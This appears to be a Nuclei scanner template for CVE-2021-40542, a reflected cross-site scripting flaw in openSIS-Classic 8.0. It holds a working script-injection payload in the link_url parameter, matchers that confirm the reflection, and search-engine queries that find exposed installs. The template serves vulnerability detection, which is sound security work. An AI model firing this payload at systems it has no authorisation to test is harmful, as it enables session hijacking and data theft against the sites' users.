55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2021-40542
|
|
|
|
info:
|
|
name: Opensis-Classic 8.0 - Cross-Site Scripting
|
|
author: alph4byt3
|
|
severity: medium
|
|
description: |
|
|
Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
|
|
remediation: |
|
|
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
|
|
reference:
|
|
- https://github.com/OS4ED/openSIS-Classic/issues/189
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-40542
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00342
|
|
epss-percentile: 0.71484
|
|
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: os4ed
|
|
product: opensis
|
|
shodan-query: http.title:"openSIS"
|
|
fofa-query: title="opensis"
|
|
google-query: intitle:"opensis"
|
|
tags: cve2021,cve,xss,opensis,os4ed
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950 |